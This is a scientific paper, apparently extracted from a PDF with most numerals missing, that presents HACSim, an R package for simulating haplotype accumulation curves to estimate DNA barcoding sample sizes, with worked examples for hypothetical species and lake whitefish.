accumulation curves for the actinopterygian species assessed by phillips et al. 
( ), which were far from reaching an asymptote, corroborated the finding that the majority of intraspecific haplotypes remain largely unsampled in actinopterygii for even the best-represented species in bold. estimates obtained from each of these studies stand in sharp contrast to sample sizes typically reported within dna barcoding studies. numerical optimization methods are required to obtain reasonable approximations to otherwise complex questions. many such problems proceed via the iterative method, whereby an initial guess is used to produce a sequence of successively more precise (and hopefully more accurate) approximations. such an approach is attractive, as resulting solutions can be made as precise as desired through specifying a given tolerance cutoff. however, in such cases, a closed-form expression for the function being optimized is known a priori. in many instances, the general path (behaviour) of the search space being phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. explored is the only information known, and not its underlying functional form. in this paper, we take a middle-ground approach that is an alternative to probing sampling completeness on the basis of haplotype accumulation curve slope measurement. to this end, iteration is applied to address the issue of relative sample size determination for dna barcode haplotype sampling completeness, a technique suggested by phillips, gillis & hanner ( ). given that specimen collection and processing is quite a laborious and costly endeavour (cameron, rubinoff & will, ; stein et al., ), the next most direct solution to an otherwise blind search strategy is to employ computational simulation that approximates specimen collection in the field. the main contribution of this work is the introduction of a new, easy-to-use r package implementing a novel statistical optimization algorithm to estimate sample sizes for assessment of genetic diversity within species based on saturation observed in haplotype accumulation curves. here, we present a novel nonparametric stochastic (monte carlo) iterative extrapolation algorithm for the generation of haplotype accumulation curves based on the approach of phillips et al. ( ). using the statistical environment r (r core team, ), we examine the effect of altering species haplotype frequencies on the shape of resulting curves to inform on likely required sample sizes needed for adequate capture of within-species haplotype variation. proof-of-concept of our method is illustrated through both hypothetical examples and real dna sequence data. motivation consider n dna sequences that are randomly sampled for a given species of interest across its known geographic range, each of which correspond to a single specimen. suppose further that h* of such sampled dna sequences are unique (i.e., are distinct haplotypes). this scenario leads naturally to the following question: what is n*, the estimated total number of dna sequence haplotypes that exist for a species θ? put another way, what sample size (number of specimens) is needed to capture the existing haplotype variation for a species? the naïve approach (adopted by phillips et al. ( )) would be to ignore relative frequencies of observed haplotypes; that is, assume that species haplotypes are equally probable in a species population. thus, in the absence of any information, the best one can do is adopt a uniform distribution for the number of sampled haplotypes. 
such a path leads to obtaining gross overestimates for sufficient sampling (phillips et al., ). a much better approach uses all available haplotype data to arrive at plausible estimates of required taxon sample sizes. this latter method is explored here in detail. methods haplotype accumulation curve simulation algorithm algorithm functions our algorithm, hacsim (short for haplotype accumulation curve simulator), consisting of two user-defined r functions, hac.sim() and hac.simrep(), was created to run simulations of haplotype accumulation curves based on user-supplied parameters. the simulation treats species haplotypes as distinct character labels relative to the number of individuals possessing a given haplotype. the usual convention in this regard is that phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure modified haplotype network from phillips, gillis & hanner ( ). haplotypes are labelled according to their absolute frequencies such that the most frequent haplotype is labelled ‘‘ ’’, the second- most frequent haplotype is labelled ‘‘ ’’, etc., and is meant to illustrate that much species locus variation consists of rare haplotypes at very low frequency (typically only represented by or specimens). thus, species showing such patterns in their haplotype distributions are probably grossly under-respresented in public sequence databases like bold and genbank. full-size doi: . /peerjcs. /fig- haplotype is the most frequent, haplotype is the next most frequent, etc. (gwiazdowski et al., ). a haplotype network represents this scheme succinctly (fig. ). such an implementation closely mimics that seen in natural species populations, as each character label functions as a unique haplotype linked to a unique dna barcode sequence. the algorithm then randomly samples species haplotype labels in an iterative fashion with replacement until all unique haplotypes have been observed. this process continues until all species haplotypes have been sampled. the idea is that levels of species haplotypic variation that are currently catalogued in bold can serve as proxies for total haplotype diversity that may exist for a given species. this is a reasonable assumption given that, while estimators of expected diversity are known (e.g., chao abundance) (chao, ), the frequencies of unseen haplotypes are not known a priori. further, assuming a species is sampled across its entire geographic range, haplotypes not yet encountered are presumed to occur at low frequencies (otherwise they would likely have already been sampled). because r is an interpreted programming language (i.e., code is run line-by-line), it is slow compared to faster alternatives which use compilation to convert programs into machine-readable format; as such, to optimize performance of the present algorithm in terms of runtime, computationally-intensive parts of the simulation code were written in the c++ programming language and integrated with r via the packages rcpp (eddelbuettel & françois, ) and rcpparmadillo (eddelbuettel & sanderson, ). this includes phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. function code to carry out haplotype accumulation (via the function accumulate(), which is not directly called by the user). 
a further reason for turning to c++ is because some r code (e.g., nested ‘for’ loops) is not easily vectorized, nor can parallelization be employed for speed improvement due to loop dependence. the rationale for employing r for the present work is clear: r is free, open-source software that it is gaining widespread use within the dna barcoding community due to its ease-of-use and well-established user-contributed package repository (comprehensive r archive network (cran)). as such, the creation and disemination of hacsim as a r framework to assess levels of standing genetic variation within species is greatly facilitated. a similar approach to the novel one proposed here to automatically generate haplotype accumulation curves from dna sequence data is implemented in the r package spider (species identity and evolution in r; (brown et al., )) using the haploaccum() function. however, the approach, which formed the basis of earlier work carried out by phillips et al. ( ), is quite restrictive in its functionality and, to our knowledge, is currently the only method available to generate haplotype accumulation curves in r because spider generates haplotype accumulation curves from dna sequence alignments only and is not amenable to inclusion of numeric inputs for specimen and haplotype numbers. thus, the method could not be easily extended to address our question. this was the primary reason for the proposal of a statistical model of sampling sufficiency by phillips et al. ( ) and its extension described herein. algorithm parameters at present, the algorithm (consisting of hac.sim() and hac.simrep()) takes arguments as input (table ). a user must first specify the number of observed specimens/dna sequences (n) and the number of observed haplotypes (i.e., unique dna sequences) (h*) for a given species. both n and h* must be greater than one. clearly, n must be greater than or equal to h*. next, the haplotype frequency distribution vector must be specified. the probs argument allows for the inclusion of both common and rare species haplotypes according to user interest (e.g., equally frequent haplotypes, or a single dominant haplotype). the resulting probs vector must have a length equal to h*. for example, if h*= , probs must contain four elements. the total probability of all unique haplotypes must sum to one. the user can optionally input the fraction of observed haplotypes to capture p. by default, p= . , mirroring the approach taken by both zhang et al. ( ) and bergsten et al. ( ) who computed intraspecific sample sizes needed to recover % of all haplotype variation for a species. at this level, the generated haplotype accumulation curve reaches a slope close to zero and further sampling effort is unlikely to uncover any new haplotypes. however, a user may wish to obtain sample sizes corresponding to different haplotype recovery levels, e.g., p= . ( % of all estimated haplotypes found). in the latter scenario, it can be argued that % of species haplotype variation is never actually achieved, since with greater sampling effort, additional haplotypes are almost surely to be found; thus, a true asymptote is never reached. in any case, simulation completion times will vary phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table parameters inputted (first ) and outputted (last six) by hac.sim() and hac.simrep(), along with their definitions. 
range refers to plausible values that each parameter can assume within the haplotype accumulation curve simulation algorithm. [ and ] indicate that a given value is included in the range interval, whereas ( and ) indicate that a given value is excluded from the range interval. simulation progress can be tracked through setting progress = true within hachypothetical() or hacreal(). users can optionally specify that a file be created containing all information outputted to the r console (via the argument filename, which can be named as the user wishes).

parameter | definition | range
n | total number of specimens/dna sequences | ( , ∞)
h* | total number of unique haplotypes | ( , n]
probs | haplotype probability distribution vector | ( , )
p | proportion of haplotypes to recover | ( , ]
perms | total number of permutations | ( , ∞)
input.seqs | analyze fasta file of species dna sequences | true, false
conf.level | desired confidence level for confidence interval calculation | ( , )
h | cumulative mean number of haplotypes sampled | [ , h*]
h* − h | cumulative mean number of haplotypes not sampled | [ , h*)
r = h/h* | cumulative mean fraction of haplotypes sampled | ( , ]
(h* − h)/h* | cumulative mean fraction of haplotypes not sampled | [ , )
n* | mean specimen sample size corresponding to h* | [n, ∞)
n* − n | mean number of individuals not sampled | [ , n]

the perms argument is in place to ensure that haplotype accumulation curves "smooth out" and tend to h* asymptotically as the number of permutations (replications) is increased. the effect of increasing the number of permutations is an increase in statistical accuracy and, consequently, a reduction in variance. the proposed simulation algorithm outputs a mean haplotype accumulation curve that is the average of perms generated haplotype accumulation curves, where the order of individuals sampled is randomized. each of these perms curves is a randomized step function (a sort of random walk), generated according to the number of haplotypes found. a permutation size of , was used by phillips et al. ( ) because smaller permutation sizes yielded non-smooth (noisy) curves. permutation sizes larger than , typically resulted in greater computation time, with no noticeable change in accumulation curve behaviour (phillips et al., ). by default, perms = , (in contrast to phillips et al. ( )), which is comparable to the large number of replicates typically employed in statistical bootstrapping procedures needed to ensure accuracy of computed estimates (efron, ). sometimes it will be necessary for users to sacrifice accuracy for speed in the presence of time constraints. this can be accomplished through decreasing perms; doing so, however, will result in only near-optimal solutions for specimen sample sizes. in some cases, it may be necessary to increase perms to further smooth out the curves (to ensure monotonicity), but this will increase algorithm runtime substantially. should a user wish to analyze their own intraspecific coi dna barcode sequence data (or sequence data from any single locus for that matter), setting input.seqs =
when this occurs, arguments for n , h* and probs are set automatically by the algorithm via functions available in the r packages ape (analysis of phylogenetics and evolution) (paradis, claude & strimmer, ) and pegas (population and evolutionary genetics analysis system) (paradis, ). users must be aware however that the number of observed haplotypes treated by pegas (via the haplotype() function) may be overestimated if missing/ambiguous nucleotide data are present within the final alignment input file. missing data are explicitly handled by the base.freq() function in the ape package. when this occurs, r will output a warning that such data are present within the alignment. users should therefore consider removing sequences or sites comprising missing/ambiguous nucleotides. this step can be accomplished using external software such as mega (molecular evolutionary genetics analysis; (kumar, stecher & tamura, )). the barcode standard (hanner, ) was developed to help identify high quality sequences and can be used as a quality filter if desired. exclusion of low-quality sequences also has the advantage of speeding up compution time of the algorithm significantly. options for confidence interval (ci) estimation and graphical display of haplotype accumulation is also available via the argument conf.level, which allows the user to specify the desired level of statistical confidence. cis are computed from the sample α % and ( − α ) % quantiles of the haplotype accumulation curve distribution. the default is conf.level = . , corresponding to a confidence level of %. high levels of statistical confidence (e.g., %) will result in wider confidence intervals; whereas low confidence leads to narrower interval estimates. how does hacsim work? haplotype labels are first randomly placed on a two-dimensional spatial grid of size perms × n (read perms rows by n columns) according to their overall frequency of occurrence (fig. ). the cumulative mean number of haplotypes is then computed along each column (i.e., for every specimen). if all h* haplotypes are not observed, then the grid is expanded to a size of perms×n* and the observed haplotypes enumerated. estimation of specimen sample sizes proceeds iteratively, in which the current value of n* is used as a starting value to the next iteration (fig. ). an analogy here can be made to a game of golf: as one aims towards the hole and hits the ball, it gets closer and closer to the hole; however, one does not know the number of times to hit the ball before it lands in the hole. it is important to note that since sample sizes must be whole values, estimates of n* found at each iteration are rounded up to the next whole number. even though this approach is quite conservative, it ensures that estimates are adequately reflective of the population from which they were drawn. hac.sim(), which is called internally from hac.simrep(), performs a single iteration of haplotype accumulation for a given species. in the case of real species, resulting output reflects current levels of sampling effort found within bold (or another similar sequence repository such as genbank) for a given species. if the desired level of haplotype recovery is not reached, then hac.simrep() is called to perform successive iterations until phillips et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic of the hacsim optimization algorithm (setup, initialization and iteration). 
shown is a hypothetical example for a species mined from a biological sequence database like bold or genbank with n = sampled specimens (dna sequences) possessing h* = unique haplotypes. each haplotype has an associated numeric id from -h* (here, - ). haplotype labels are randomly assigned to cells on a two-dimensional spatial array (array) with perms rows and n columns. all haplotypes occur with a frequency of % (i.e., probs = ( / , / , / , / , / )). specimen and haplotype information is then fed into a black box to iteratively optimize the likely required sample size (n*) needed to capture a proportion of at least p haplotypes observed in the species sample.

the observed fraction of haplotypes captured (r) is at least p. this stopping criterion is the termination condition necessary to halt the algorithm as soon as a "good enough" solution has been found. such criteria are widely employed within numerical analysis. at each step of the algorithm, a dataset, in the form of a dataframe (called "d") consisting of the mean number of haplotypes recovered (called means), along with the estimated standard deviation (sds) and the number of specimens sampled (specs), is generated. the estimated required sample size (n*) to recover a given proportion of observed species haplotypes corresponds to the endpoint of the accumulation curve. an indicator message is additionally outputted informing a user as to whether or not the desired level of haplotype recovery has been reached. the algorithm is depicted in fig. .

figure: iterative extrapolation algorithm pseudocode for the computation of taxon sampling sufficiency employed within hacsim. a user must input n, h* and probs to run simulations. other function arguments required by the algorithm have default values and do not need to be inputted unless the user wishes to alter the set parameters.

in fig. , all input parameters are known a priori except h_i, which is the number of haplotypes found at each iteration of the algorithm, and r_i = h_i/h*, which is the observed fraction of haplotype recovery at iteration i. the equation to compute n*,

n*_{i+1} = n_i + (n_i / h_i)(h* − h_i) = n_i h* / h_i = n_i / r_i,    (1)

is quite intuitive since, as h_i approaches h*, h* − h_i approaches zero, r_i = h_i/h* approaches one, and consequently n_i approaches n*. in the first part of the above equation, the quantity (n_i/h_i)(h* − h_i) is the amount by which the haplotype accumulation curve is extrapolated, which incorporates random error and uncertainty regarding the true value of θ in the search space being explored. nonparametric estimates formed from the above iterative method produce a convergent, monotonically-increasing sequence, which becomes closer and closer to n* as the number of iterations increases; that is,

n*_1 ≤ n*_2 ≤ ... ≤ n*_i ≤ n*_{i+1} → n*,    (2)

which is clearly a desirable property. since haplotype accumulation curves are bounded below by one and bounded above by h*, the above sequence has a lower bound equal to the initial guess for specimen sampling sufficiency (n) and an upper bound of n*.
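to make eq. (1) concrete, the stand-alone sketch below mimics the update on a toy example: haplotype labels are sampled with replacement, the mean number of distinct haplotypes recovered is estimated over many replicates, and the sample size is extrapolated until a fraction p of the h* haplotypes is recovered. this is a simplified illustration of the logic, not the hacsim implementation itself; the function name, arguments, and example values are invented.

# toy re-implementation of the extrapolation step in eq. (1)
extrapolate_sample_size <- function(N, Hstar, probs, p = 0.95,
                                    perms = 1000, max_iter = 50) {
  Ni <- N
  for (i in seq_len(max_iter)) {
    # mean number of distinct haplotypes seen in Ni draws, over perms replicates
    Hi <- mean(replicate(perms,
                 length(unique(sample(seq_len(Hstar), Ni,
                                      replace = TRUE, prob = probs)))))
    Ri <- Hi / Hstar
    if (Ri >= p) return(list(Nstar = Ni, iterations = i, R = Ri))
    Ni <- ceiling(Ni * Hstar / Hi)        # eq. (1): n*_{i+1} = n_i h*/h_i
  }
  list(Nstar = Ni, iterations = max_iter, R = Ri)
}

# example: 10 haplotypes, three common and seven rare (values are illustrative)
set.seed(1)
extrapolate_sample_size(N = 50, Hstar = 10,
                        probs = c(rep(0.2, 3), rep(0.4/7, 7)))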
along with the iterated haplotype accumulation curves and haplotype frequency barplots, simulation output consists of the five initially proposed "measures of sampling closeness", the estimate of θ (n*) based on phillips et al. ( )'s sampling model, and the number of additional samples needed to recover all estimated total haplotype variation for a given species (n* − n; fig. ) (table ). these five quantities are given as follows:

(1) mean number of haplotypes sampled: h_i,
(2) mean number of haplotypes not sampled: h* − h_i,
(3) proportion of haplotypes sampled: h_i/h*,
(4) proportion of haplotypes not sampled: (h* − h_i)/h*,
(5) mean number of individuals not sampled: n* − n_i = (n_i/h_i)(h* − h_i),

and are analogous to the absolute and relative approximation error metrics seen in numerical analysis. it should be noted that the mean number of haplotypes captured at each iteration, h_i, will not necessarily be increasing, even though estimates of the cumulative mean value of n* are. it is easily seen above that h_i approaches h* with an increasing number of iterations. similarly, as the simulation progresses, h* − h_i, (h* − h_i)/h*, and n* − n_i = (n_i/h_i)(h* − h_i) all approach zero, while h_i/h* approaches one. the rate at which curves approach h* depends on the inputs to both hac.sim() and hac.simrep(). once the algorithm has converged to the desired level of haplotype recovery, a summary of findings is outputted consisting of (1) the initial guess (n) for sampling sufficiency; (2) the total number of iterations until convergence and the simulation runtime (in seconds); (3) the final estimate (n*) of sampling sufficiency, along with an approximate (1 − α)100% confidence interval (see next paragraph); and (4) the number of additional specimens required to be sampled (n* − n) from the initial starting value. iterations are automatically separated by a progress meter for easy visualization.

figure: graphical depiction of the iterative extrapolation sampling model as described in detail herein. the figure is modified from phillips, gillis & hanner ( ). the x-axis depicts the number of specimens sampled, whereas the y-axis conveys the cumulative number of unique haplotypes uncovered for every additional individual that is randomly sampled. n_i and h_i refer respectively to the specimen and haplotype numbers observed at each iteration (i) of hacsim for a given species. n* is the total sample size needed to capture all h* haplotypes that exist for a species.

an approximate symmetric (1 − α)100% ci for θ is derived using the (first-order) delta method (casella & berger, ). this approach relies on the asymptotic normality result of the clt and employs a first-order taylor series expansion around θ to arrive at an approximation of the variance (and corresponding standard error) of n*. such an approach is convenient since the sampling distribution of n* would likely be difficult to compute exactly due to specimen sample sizes being highly taxon-dependent. an approximate (large-sample) (1 − α)100% ci for θ is given by

n* ± z_{1−α/2} (σ̂_h / h) √n*,    (3)

where z_{1−α/2} denotes the appropriate critical value from the standard normal distribution and σ̂_h is the estimated standard deviation of the mean number of haplotypes recovered at n*. the interval produced by this approach is quite tight, shrinking as h_i tends to h*. by default, hacsim computes % confidence intervals for the abovementioned quantities.
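a small helper reporting these quantities for a single iteration might look as follows. this is a sketch only: the interval uses the delta-method form of eq. (3) as written above, and all names and example values are invented rather than taken from the package.

# summarize one iteration of the sampling model: Ni specimens examined,
# Hi mean haplotypes recovered, Hstar observed haplotypes, sd_H the standard
# deviation of the mean haplotype count at the current estimate of n*.
sampling_closeness <- function(Ni, Hi, Hstar, sd_H = NA, conf.level = 0.95) {
  Nstar <- Ni * Hstar / Hi
  out <- list(
    haps_sampled          = Hi,
    haps_not_sampled      = Hstar - Hi,
    frac_sampled          = Hi / Hstar,
    frac_not_sampled      = (Hstar - Hi) / Hstar,
    specimens_not_sampled = Nstar - Ni,
    Nstar                 = Nstar
  )
  if (!is.na(sd_H)) {                      # delta-method interval, eq. (3)
    z <- qnorm(1 - (1 - conf.level) / 2)
    half <- z * (sd_H / Hi) * sqrt(Nstar)
    out$ci <- c(lower = Nstar - half, upper = Nstar + half)
  }
  out
}

sampling_closeness(Ni = 50, Hi = 8.6, Hstar = 10, sd_H = 1.1)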
it is important to consider how a confidence interval for θ should be interpreted. for instance, a % ci for θ of (l, u), where l and u are the lower and upper endpoints of the confidence interval respectively, does not mean that the true sampling sufficiency lies between (l, u) with % probability. instead, the resulting confidence intervals for θ are themselves random and should be interpreted in the following way: with repeated sampling, one can be (1 − α)100% confident that the true sampling sufficiency for p% haplotype recovery for a given species lies in the range (l, u). that is, on average, (1 − α)100% of constructed confidence intervals will contain θ. it should be noted, however, that since computed confidence intervals are only approximate in the limit, the desired nominal probability coverage may not be achieved. in other words, the proportion of calculated (1 − α)100% intervals that actually contain θ may fall short of the nominal level.

hacsim has been implemented as an object-oriented framework to improve modularity and overall user-friendliness. scenarios of hypothetical and real species are contained within helper functions which comprise all information necessary to run simulations successfully without having to specify certain function arguments beforehand. to carry out simulations of sampling haplotypes from hypothetical species, the function hachypothetical() must first be called. similarly, haplotype sampling for real species is handled by the function hacreal(). in addition to all input parameters required by hac.sim() and hac.simrep() outlined in table , both hachypothetical() and hacreal() take further arguments. both functions take the optional argument filename, which is used to save results outputted to the r console to a csv file. when either hachypothetical() or hacreal() is invoked (i.e., assigned to a variable), an object herein called hacsobj is created containing the arguments employed by hacsim in running simulations. note that the generated object can have any name the user desires. further, all simulation variables are contained in an environment called 'envr' that is hidden from the user.

results

here, we outline some simple examples that highlight the overall functionality of hacsim. when the code below is run, outputted results will likely differ from those depicted here since our method is inherently stochastic. hence, it should be stressed that there is not one single solution for the problem at hand, but rather multiple solutions (spall, ). this is in contrast to a completely deterministic model, where a given input always leads to the same unique output. to ensure reproducibility, the user can set a random seed value using the base r function set.seed() prior to running hac.simrep(). it is important that a user set a working directory in r prior to running hacsim, which will ensure all created files ('seqs.fas' and 'output.csv') are stored in a single location for easy access and reference at a later time. in all scenarios, default parameters were unchanged (perms = , , p = . ).

application of hacsim to hypothetical species

equal haplotype frequencies

figure shows sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with n = and h* = . all haplotypes are assumed to occur with equal frequency (i.e., probs = . ). algorithm output is shown below.
## set parameters for hypothetical species ##
> n <-    # total number of sampled individuals
> hstar <-    # total number of haplotypes
> probs <- rep(1/hstar, hstar)    # equal haplotype frequency
### run simulations ###
> hacsobj <- hachypothetical(n = n, hstar = hstar, probs = probs)    # call helper function
# set seed here if desired, e.g., set.seed( )
> hac.simrep(hacsobj)
simulating haplotype accumulation...
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled:
mean number of haplotypes not sampled:
proportion of haplotypes sampled:
proportion of haplotypes not sampled:
mean value of n*:
mean number of specimens not sampled:
desired level of haplotype recovery has been reached
---------- finished. ----------
the initial guess for sampling sufficiency was n = individuals
the algorithm converged after iterations and took . s
the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: - )
the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals
figure : graphical output of hac.sim() for a hypothetical species with equal haplotype frequencies. (a) iterated haplotype accumulation curve. (b) corresponding haplotype frequency barplot. for the generated haplotype accumulation curve, the % confidence interval for the number of unique haplotypes accumulated is depicted by gray error bars. dashed lines depict the observed number of haplotypes (i.e., rh*) and the corresponding number of individuals sampled found at each iteration of the algorithm. the dotted line depicts the expected number of haplotypes for a given haplotype recovery level (here, p = %) (i.e., ph*). in this example, r = % of the h* = estimated haplotypes have been recovered for this species based on a sample size of only n = specimens.
algorithm output shows that r = % of the h* = haplotypes are recovered from the random sampling of n = individuals, with lower and upper % confidence limits of – . no additional specimens need to be collected (n* − n = ). simulation results, consisting of the six ''measures of sampling closeness'' computed at each iteration, can optionally be saved in a comma-separated value (csv) file called 'output.csv' (or another filename of the user's choosing). figure shows that when haplotypes are equally frequent in species populations, corresponding haplotype accumulation curves reach an asymptote very quickly. as sampling effort is increased, the confidence interval becomes narrower, thereby reflecting one's increased confidence in having likely sampled the majority of haplotype variation existing for a given species. expected counts of the number of specimens possessing a given haplotype can be found by running max(envr$d$specs) * envr$probs in the r console once a simulation has converged, as sketched below. however, real data suggest that haplotype frequencies are not equal.
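the expected-count calculation mentioned above can be spelled out as follows; treating the hidden 'envr' environment, and in particular envr$d$specs and envr$probs, as queryable from the console is an assumption based on the usage shown in this section.

> # expected number of specimens carrying each haplotype once hac.simrep() has converged:
> # the largest sample size reached, multiplied by each haplotype's relative frequency
> expected.counts <- max(envr$d$specs) * envr$probs
> round(expected.counts)

under equal haplotype frequencies every entry of expected.counts is identical; skewed values of probs translate directly into correspondingly skewed expected counts.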
unequal haplotype frequencies
figures and show sample graphical output of the proposed haplotype accumulation curve simulation algorithm for a hypothetical species with n = and h* = . all haplotypes occur with unequal frequency. haplotypes – each have a frequency of %, while the remaining seven haplotypes each occur with a frequency of c. . %.
## set parameters for hypothetical species ##
> n <-
> hstar <-
> probs <- c(rep( . , ), rep( . / , ))    # three dominant haplotypes each with % frequency
### run simulations ###
> hacsobj <- hachypothetical(n = n, hstar = hstar, probs = probs)
> hac.simrep(hacsobj)
simulating haplotype accumulation...
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has been reached
---------- finished. ----------
the initial guess for sampling sufficiency was n = individuals
the algorithm converged after iterations and took . s
the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: . - . )
the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals
figure : initial graphical output of hac.sim() for a hypothetical species having three dominant haplotypes. (a) specimens sampled; (b) unique haplotypes. in this example, initially, only r = . % of the h* = estimated haplotypes have been recovered for this species based on a sample size of n = specimens.
figure : final graphical output of hac.sim() for a hypothetical species having three dominant haplotypes. (a) specimens sampled; (b) unique haplotypes. in this example, upon convergence, r = . % of the h* = estimated haplotypes have been recovered for this species based on a sample size of n = specimens.
note that not all iterations are displayed above for the sake of brevity; only the first and last two iterations are given. with an initial guess of n = , only r = . % of all h* = observed haplotypes are recovered. the value of n* = in the first iteration above serves as an improved initial guess of the true sampling sufficiency, which is an unknown quantity that is being estimated. this value is then fed back into the algorithm and the process is repeated until convergence is reached. using eq. ( ), the improved sample size was calculated as n* = + . ( − . ) = . . after one iteration, the curve has been extrapolated by an additional n* − ni = . individuals. upon convergence, r = . % of all observed haplotypes are captured with a sample size of n* = specimens, with a % ci of . – . . given that n = individuals have already been sampled, the number of additional specimens required is n* − n = individuals. the user can verify that sample sizes close to that found by hacsim are needed to capture % of existing haplotype variation: simply set n = n* = and rerun the algorithm. the last iteration serves as a check to verify that the desired level of haplotype recovery has been achieved. the value of n* = . that is outputted at this step can be used as a good starting guess to extrapolate the curve to higher levels of haplotype recovery, to save on the number of iterations required to reach convergence. to do this, one simply runs hachypothetical() with n = .
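the verification step just described can be written out explicitly. the call below simply reuses the helper function with the converged estimate as the new starting sample size; here nstar is a placeholder for whatever value of n* a particular run reports (left blank, as in the other listings), and is not itself a hacsim argument.

> nstar <-    # converged estimate of n* reported by the previous run
> hacsobj.check <- hachypothetical(n = nstar, hstar = hstar, probs = probs)
> hac.simrep(hacsobj.check)    # r should now meet or exceed the chosen recovery level p

because the algorithm is stochastic, the recovered fraction r will vary slightly between such verification runs, but it should sit at or above p when n is set near the reported n*.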
application of hacsim to real species
because the proposed iterative haplotype accumulation curve simulation algorithm simply treats haplotypes as numeric labels, it is easily generalized to any biological taxa and genetic loci for which a large number of high-quality dna sequence data records is available in public databases such as bold. in the following examples, hacsim is employed to examine levels of standing genetic variation within animal species using ′-coi.
lake whitefish (coregonus clupeaformis)
an interesting case study on which to focus is that of lake whitefish (coregonus clupeaformis). lake whitefish are a commercially, culturally, ecologically and economically important group of salmonid fishes found throughout the laurentian great lakes in canada and the united states, particularly to the saugeen ojibway first nation (son) of the bruce peninsula in ontario, canada, as well as to non-indigenous fisheries (ryan & crawford, ). the colonization of refugia during pleistocene glaciation is thought to have resulted in high levels of cryptic species diversity in north american freshwater fishes (hubert et al., ; april et al., ; april et al., a; april et al., b). overdyk et al. ( ) wished to investigate this hypothesis in larval lake huron lake whitefish. despite limited levels of gene flow and the likely formation of novel divergent haplotypes in this species, surprisingly, no evidence of deep evolutionary lineages was observed across the three major basins of lake huron, despite marked differences in larval phenotype and adult fish spawning behaviour (overdyk et al., ). this may be the result of limited sampling of intraspecific genetic variation, in addition to presumed panmixia (overdyk et al., ). while lake whitefish represent one of the most well-studied fishes within bold, sampling effort for this species has nevertheless remained relatively static over the past few years. thus, lake whitefish represent an ideal species for further exploration using hacsim.
in applying the developed algorithm to real species, sequence data preparation followed the methodology outlined in phillips et al. ( ). curation included the exclusion of specimens linked to genbank entries, since records without the barcode keyword designation lack appropriate metadata central to reference sequence library construction and management (hanner, ). our approach here was solely to assess the comprehensiveness of single genomic sequence databases rather than incorporating sequence data from multiple repositories; thus, all dna barcode sequences either originating from, or submitted to, genbank were not considered further.
as well, the presence of base ambiguities and gaps/indels within sequence alignments can lead to bias in estimates of haplotype diversity for a given species. currently (as of november , ), bold contains public (both barcode and non-barcode) records for c. clupeaformis specimens collected from lake huron in northern parts of ontario, canada and michigan, usa. of the barcode sequences, n = are of high quality (full-length ( bp), comprising no missing and/or ambiguous nucleotide bases). haplotype analysis reveals that this species currently comprises h* = unique coi haplotypes. further, this species shows a highly-skewed haplotype frequency distribution, with a single dominant haplotype accounting for c. . % ( / ) of all individuals (fig. ). the output of hacsim is displayed below.
### run simulations ###
> hacsobj <- hacreal()
> hac.simrep(hacsobj)
simulating haplotype accumulation...
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has not yet been reached
|==========================================================| %
--- measures of sampling closeness ---
mean number of haplotypes sampled: .
mean number of haplotypes not sampled: .
proportion of haplotypes sampled: .
proportion of haplotypes not sampled: .
mean value of n*: .
mean number of specimens not sampled: .
desired level of haplotype recovery has been reached
---------- finished. ----------
the initial guess for sampling sufficiency was n = individuals
the algorithm converged after iterations and took . s
the estimate of sampling sufficiency for p = % haplotype recovery is n* = individuals ( % ci: . - . )
the number of additional specimens required to be sampled for p = % haplotype recovery is n* - n = individuals
from the above output, it is clear that current specimen sample sizes found within bold for c. clupeaformis are probably not sufficient to capture the majority of within-species coi haplotype variation. an initial sample size of n = specimens corresponds to recovering only . % of all h* = unique haplotypes for this species (fig. ).
figure : initial haplotype frequency distribution for n = high-quality lake whitefish (coregonus clupeaformis) coi barcode sequences obtained from bold. this species displays a highly-skewed pattern of observed haplotype variation, with haplotype accounting for c. . % ( / ) of all sampled records.
figure : initial graphical output of hac.sim() for a real species (lake whitefish, c. clupeaformis) having a single dominant haplotype. (a) specimens sampled; (b) unique haplotypes. in this example, initially, only r = . % of the h* = estimated haplotypes for this species have been recovered based on a sample size of n = specimens. the haplotype frequency barplot is identical to that of fig. .
a sample size of n* = individuals ( % ci [ . – . ]) would likely be needed to observe % of all existing genetic diversity for lake whitefish (fig. ). since n = individuals have been sampled previously, only n* − n = specimens remain to be collected.
figure : final graphical output of hac.sim() for lake whitefish (c. clupeaformis) having a single dominant haplotype. (a) specimens sampled; (b) unique haplotypes. upon convergence, r = . % of the h* = estimated haplotypes for this species have been uncovered with a sample size of n = specimens.
deer tick (ixodes scapularis)
